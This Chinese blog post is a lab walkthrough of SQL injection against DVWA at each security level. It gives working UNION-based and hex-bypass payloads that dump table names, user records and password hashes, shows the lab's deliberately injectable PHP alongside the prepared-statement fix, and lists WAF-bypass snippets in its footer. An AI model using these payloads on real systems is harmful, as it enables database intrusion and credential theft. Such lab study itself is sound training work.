DVWA——SQL注入

最新推荐文章于 2023-02-01 15:46:12 发布
最新推荐文章于 2023-02-01 15:46:12 发布
阅读量240 收藏
点赞数
分类专栏: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44817272/article/details/118354265
版权

一点点的sql知识:

SQL语句使用注意事项:
SQL 语言大小写不敏感。
SQL 可以写在一行或者多行
关键字不能被缩写也不能分行
各子句一般要分行写。
使用缩进提高语句的可读性。

MySQL数据库5.0版本以后和5.0版本以前有一个大的区别,就是MySQL5.0以后的版本中默认放着一个information_schema数据库,这个数据库存放着该数据库中所有的库名、表名和列名等等。
>>>可以根据information_schema这个数据库来爆出数据库的库名、表名和列名了,而MySQL5.0以前的版本只能通过暴力破解来跑库名、表名和列名。
schemata表提供了当前mysql实例中所有数据库的信息。
数据库中符号“.”代表下一级,如a.user表示a数据库下的user表名
information_schema.tables;记录所有表名信息的表;table_name;  表名   information_schema.columns;记录所有列名信息的表;column_name; 列名   table_schema; 数据库名
数据库版本(version())、名字(database())、用户(user()),操作系统(@@version_compile_os)
更多的 慢慢学吧,反正现在是不会。。。。

SQL注入漏洞介绍:

SQL注入是指Web应用程序对用户输入数据的合法性没有进行判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库中查询,攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作。
根据相关技术原理,SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所致;后者主要是由于程序员对输入未进行细致地过滤,从而执行了非法的数据查询。基于此,SQL注入的产生原因通常表现在以下几方面:①不当的类型处理;②不安全的数据库配置;③不合理的查询集处理;④不当的错误处理;⑤转义字符处理不合适;⑥多个提交处理不当。

Low级别

手工注入
1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定显示的字段顺序 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.下载数据。
注意观察url注意观察url
1.判断是否存在注入,注入是字符型还是数字型
输入1,查询成功
在这里插入图片描述
输入2,得到
在这里插入图片描述
直到输入6 ,没有任何显示。
在这里插入图片描述
输入1’ or ‘1=2得到下图,返回了多个结果,说明存在字符型注入。
在这里插入图片描述
使用order by猜测sql查询语句中的字段数。
输入:1’ or 1=1 order by 1 # ;(#和 – (有个空格)表示注释,可以使它们后面的语句不被执行)
在这里插入图片描述
输入:1’ or 1=1 order by 2 # ;
在这里插入图片描述输入:1’ or 1=1 order by 3 # ;报错,说明没有第三个字段。
在这里插入图片描述
输入1’ union select 1,2 #,确认字段顺序,从下图可以看出,First name是第一个字段,Suname是第二个字段。
在这里插入图片描述
获取当前数据库及版本,输入:1’ union select database() ,version() #;得到数据库及版本
在这里插入图片描述
获取数据库中的表。输入:1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() # (获取数据库中的表)

group_concat函数的功能:将group by产生的同一个分组中的值连接起来,返回一个字符串结果。
group_concat函数首先根据group by指定的列进行分组,将同一组的列显示出来,并且用分隔符分隔。由函数参数(字段名)决定要返回的列
函数语法:group_concat( [DISTINCT] 要连接的字段 [Order BY 排序字段 ASC/DESC] [Separator ‘分隔符’] )
即:group_concat([distinct] 字段名 [order by 排序字段 asc/desc] [separator '分隔符'])
说明:
  (1)使用distinct可以排除重复值;
  (2)如果需要对结果中的值进行排序,可以使用order by子句;
  (3)separator是一个字符串值,默认为逗号。

在这里插入图片描述

此类问题是由于UNION Mysql的Table的时候对应的字段Collation字符序不同导致的。
通过修改字段的Collation解决此类错误,或者创建字段的时候统一字段的Collation
重新查看字符集及数据表字段编码字符是否一致:
  utf8_bin
  utf8_general_ci
  utf8_unicode_ci
  utf8_bin 与 utf8_general_ci 可以
  utf8_bin 与 utf8_unicode_ci 可以
  utf8_general_ci 与 utf8_unicode_ci 不可以

解决方法:使用16进制读取,获取数据库中的表 1’ union select 1,hex(table_name) from information_schema.tables where table_schema=database() #
在这里插入图片描述
使用16进制解码:guestbook;users
获取users表中的字段名:1’ union select 1,hex(column_name) from information_schema.columns where table_name=‘users’ #
在这里插入图片描述

进行16进制解码。users字段为:user_id;first_name;last_name;user;password;avatar;last_login;USER…

查询数据:1’ union select group_concat(user_id,first_name),group_concat(password) from users #
在这里插入图片描述

可以看到First name 输出为user_id,Surname输出的为password ,password为密文,用MD5转换https://www.cmd5.com/
在这里插入图片描述
即得到了所有用户名和密码
查看源码:

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
	// Get input
	$id = $_REQUEST[ 'id' ];
	// Check database
	$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
	$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
	// Get results
	while( $row = mysqli_fetch_assoc( $result ) ) {
		// Get values
		$first = $row["first_name"];
		$last  = $row["last_name"];

		// Feedback for end user
		$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
	}

	mysqli_close($GLOBALS["___mysqli_ston"]);
}
?>

可以看到,Low级别的代码对来自客户端的参数id( $id = $_REQUEST[ ‘id’ ];)没有过滤就直接带入SQL语句中,使用单引号闭合。

Medium级别

在这里插入图片描述
查看源码,和low不同之处:

<?php

if( isset( $_POST[ 'Submit' ] ) ) {
	// Get input
	$id = $_POST[ 'id' ];
	$id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);	
//......
}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?>

提交方式由REQUEST 变为了POST。利用mysql_real_escape_string函数对特殊符号\x00,\n,\r,’,”,\x1a进行转义,同时前端页面设置了下拉选择表单,希望以此来控制用户的输入。我们可以抓包修改参数,提交构造的查询参数。
方法在上篇https://blog.csdn.net/weixin_44817272/article/details/117740767中DVWA—— Brute Force中有相似操作可以借鉴。使用和low级别一样的注入方法,在数据包中修改数据。构造Payload时避免使用特殊符号\x00,\n,\r,’,”,\x1a。
得出结论:存在注入,注入类型是数字型注入
注入的Payload有:

获取数据库中的所有表:1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
获取表中的所有字段名。考虑到单引号被转义,可以利用 16 进制进行绕过:union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #
获取字段中的数据:1 union select user,password from users#

或者:
id=-1 union select 1,(SELECT GROUP_CONCAT(user,password SEPARATOR 0x3c62723e) FROM users)&Submit=Submit

High级别

查看源码:

<?php
if( isset( $_SESSION [ 'id' ] ) ) {
	// Get input
	$id = $_SESSION[ 'id' ];
	// Check database
	$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
	$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );
	// Get results
	while( $row = mysqli_fetch_assoc( $result ) ) {
		// Get values
		$first = $row["first_name"];
		$last  = $row["last_name"];
		// Feedback for end user
		$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
	}
	((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);		
}
?>

High级别的只是在SQL查询语句中添加了LIMIT 1,希望以此控制只输出一个结果。对参数没有做防御。页面自动跳转,防御了自动化的SQL注入,
虽然添加了LIMIT 1,但是我们可以通过#将其注释掉。且因为是字符型注入,手工注入的过程与Low级别基本一样
在这里插入图片描述

Impossible级别

分析源码可以看到使用了PDO技术,杜绝了SQL注入

<?php
if( isset( $_GET[ 'Submit' ] ) ) {
	// Anti-CSRF token防御CSRF攻击
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
	// Get input
	$id = $_GET[ 'id' ];
	// 检测是否是数字类型
	if(is_numeric( $id )) {
		// 预编译
		$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
		$data->bindParam( ':id', $id, PDO::PARAM_INT );
		$data->execute();
		$row = $data->fetch();
		// 确保返回一个结果
		if( $data->rowCount() == 1 ) {
			// Get values
			$first = $row[ 'first_name' ];
			$last  = $row[ 'last_name' ];
			// 给最终用户的反馈
			$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
		}
	}
}
// Generate Anti-CSRF token
generateSessionToken();
?>
乞蟹果果
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[理论-学习]Web安全-SQL注入-基础04
3hex的博客
08-17 147
声明: 由于笔者能力有限,难免出现各种错误和漏洞。全文仅作为个人笔记,仅供参考。 笔记内容来源于各类网课。 环境: 以Sqli-labs中的less11,12为实验环境。 一、实验(POST类型的基于报错的字符型注入-单引号) 1. 使用POST方式传入参数 输入的uname和passwd能影响页面显示。 2. 测试语句能否报错 使uname=1‘,能报错。 可以看出passwod使单引号闭合。但是报错的语句很难看出uname用什么闭合。 使uname=1’“,爆出un.
SQL注入Bypass WAF
PolarPeak的博客
06-01 2799
Best WAF Bypass 1 : order by /**/ORDER/**/BY/**/ /*!order*/+/*!by*/ /*!ORDER BY*/ /*!50000ORDER BY*/ /*!50000ORDER*//**//*!50000BY*/ /*!12345ORDER*/+/*!BY*/ UNION select /*!00000Union*/ /*!00000Select*/ /*!50000%55nIoN*/ /*!5000...
标准键盘码值表-十六进制
热门推荐
fengzige1993的博客
05-20 1万+
| 标准键盘码值表-十六进制 (2017-09-09 09:26:24)转载▼ 码值 含义 备注 0x08 Backspace键 0x09 Tab键 0x0C Clear键 Num Lock关闭时的数字键盘5 0x0D Enter键 0x10 Shift键 0x11 Ctrl键 0x12 Alt键 0x13 Pause键 0x14 Caps Lock键 0x1B Esc键 0x20 Spacebar键 0x21 Page Up键 0x22 Page Down键 0x23 End键
DVWA通关笔记
m0_52450604的博客
02-01 178
DVWA通关笔记(一) SQL Injection
mysql注入大全_MYSQL注入语句大全
weixin_42131705的博客
01-19 201
本文介绍MYSQL盲注的一些语句和方法学习盲注前先了解下 IFORMATION_SCHEMA 库Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。1.得到所有数据库名:|SCHEMATA ->存储数据库名的表|---字段:SCHEMA...
DVWA测试的相关资料
08-30
【描述】中提到的"DVWA"是网络安全性学习与实践的平台,它是一个专门设计的、具有各种安全漏洞的Web应用程序,旨在帮助安全专业人员和开发人员学习和理解常见的Web应用安全问题,如SQL注入、跨站脚本(XSS)、文件...
DVWA源代码
10-16
1. SQL注入DVWA的“SQL注入”部分允许用户尝试通过输入恶意SQL语句来获取数据库信息,揭示了不安全的参数化查询和错误处理的重要性。 2. XSS(跨站脚本):分为反射型、存储型和DOM型,DVWA展示了如何利用XSS漏洞...
命令注入讲解ppt.pptx
08-10
最常见的命令注入攻击形式是 SQL 命令注入攻击(简称 SQL 注入),是指恶意黑客利用设计上的安全漏洞,把 SQL 代码粘贴在网页形式的输入框内,进而改变服务端数据。 PHP 应用程序中也有名为 PHP 命令注入攻击的漏洞...
dvwa靶场训练.rar
03-17
1. **SQL注入**:DVWA中的SQL注入漏洞是最基础的练习之一。通过输入特定的字符串,攻击者可以执行恶意的SQL查询,获取数据库敏感信息或篡改数据。了解如何防止SQL注入,比如使用预编译语句、参数化查询和输入验证,...
phpstudy.zip
03-03
DVWA是一个专门为安全教育设计的脆弱Web应用,包含了各种常见的安全漏洞,如SQL注入、XSS攻击、命令注入等。用户可以尝试利用这些漏洞,学习如何进行安全测试和防护。"DVWA-master"目录就是DVWA的源代码,通过本地...
mysql 注入语句_MYSQL注入语句
weixin_33007509的博客
01-18 1157
一、信息查询 information_schema是MySQL 5.0后产生的虚拟数据库,提供访问数据库元数据的方式,即数据的数据。比如数据库所有库名或表名,列类型,访问权限。MYsql 5.X以上版本的注入查询主要基于information_schem1.UNION 注入 (联合查询注入) ≥ MySQL 5 information_schema (信息数据库),其中保存着关于 My...
SQL注入了解认识及注入方式
小羊的博客
09-08 3206
一、什么是SQL注入(SQL Injection) Sql注入是一种将SQL代码插入或添加到应用(用户)的输入参数中的攻击,之后再将这些参数传递给后台的sql服务器加以解析执行。如果攻击者能够修改SQL语句,那么该语句将与应用的用户拥有相同的运行权限。当使用SQL服务器与系统执行交互命令时,该进程将与执行命令组件拥有相同的权限。 二、SQL注入原理 由于网站开发人员或者程序编写人员在处理应用程序和数据库交互的时候,没有正确使用安全编码导致用户提交的数据(...
MySql注入科普
huike008的博客
06-01 161
默认存在的数据库: mysql 需要root权限读取 information_schema 在5以上的版本中存在 测试是否存在注入方法 假:表示查询是错误的 (MySQL 报错/返回页面与原来不同) 真:表示查询是正常的 (返回页面与原来相同) 共三种情况: 字符串类型查询时: 数字类型查询时: 登陆时: ‘ 假 ” 真 “ 假 “” 真...
SQL注入总结
Lethe's Blog
07-16 1364
一直想刷一下SQL-Labs,最近终于开始行动。刷题之前,先总结一下Mysql注入过程中常用的一些知识点吧! 一、基本知识 1、常用函数 (1)查看当前数据库版本 version() @@version @@global.version (2)查看当前登陆用户 user() current_user() system_user() session_user() (3)当前使用的数据库 ...
mysql注入
我多么希望明天有太阳,来灼烧我腐烂的梦想
12-28 619
本文介绍MYSQL盲注的一些语句和方法 学习盲注前先了解下 IFORMATION_SCHEMA 库 Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有 存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。 1.得到所有数据库名: |SCHEMATA ->存储数据库名的表 |---
达梦数据库查询数据库所有表名_【Robot Framework】数据库操作与应用
weixin_31998371的博客
12-28 1143
RF实现自动化的过程中,链接数据库的应用场景是很普遍的。可以从数据库中获取值作为参数进行传递可以通过查询数据库来校验,数据是否存储或存储是否正确自动化执行前可以执行初始化脚本自动化执行结束后可以从数据库层面进行数据回收具体配置及应用如下:一、链接Mysql1、CMD命令窗口安装Library库pip install robotframework-databaselibrary2、CMD命令窗口安装...
【转】MySql注入科普
玲珑巫女的学习笔记
11-06 2688
转载自:http://ourmysql.com/archives/1244?f=wb 默认存在的数据库: mysql 需要root权限读取 information_schema 在5以上的版本中存在 测试是否存在注入方法 假:表示查询是错误的 (MySQL 报错/返回页面与原来不同) 真:表示查询是正常的 (返
web渗透——SQL注入漏洞攻击步骤
dongxie_tk的博客
10-19 8713
SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以市面的防火墙都不会对SQL注入发出警报,如果管理员没查看ⅡS日志的习惯,可能被入侵很长时间都不会发觉。但是,SQL注入的手法相当灵活,在注入的时候会碰到很多意外的情况,需要构造巧妙的SQL语句,从而成功获取想要的数据。
dvwa靶场sql注入中级
最新发布
06-12
DVWA 的 SQL 注入中级靶场中,你需要利用 SQL 注入漏洞来获取数据库中的数据。具体步骤如下: 1. 打开 DVWA 的 SQL 注入中级靶场页面,输入用户名和密码,登录系统。 2. 在页面上找到一个输入框,例如搜索框...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值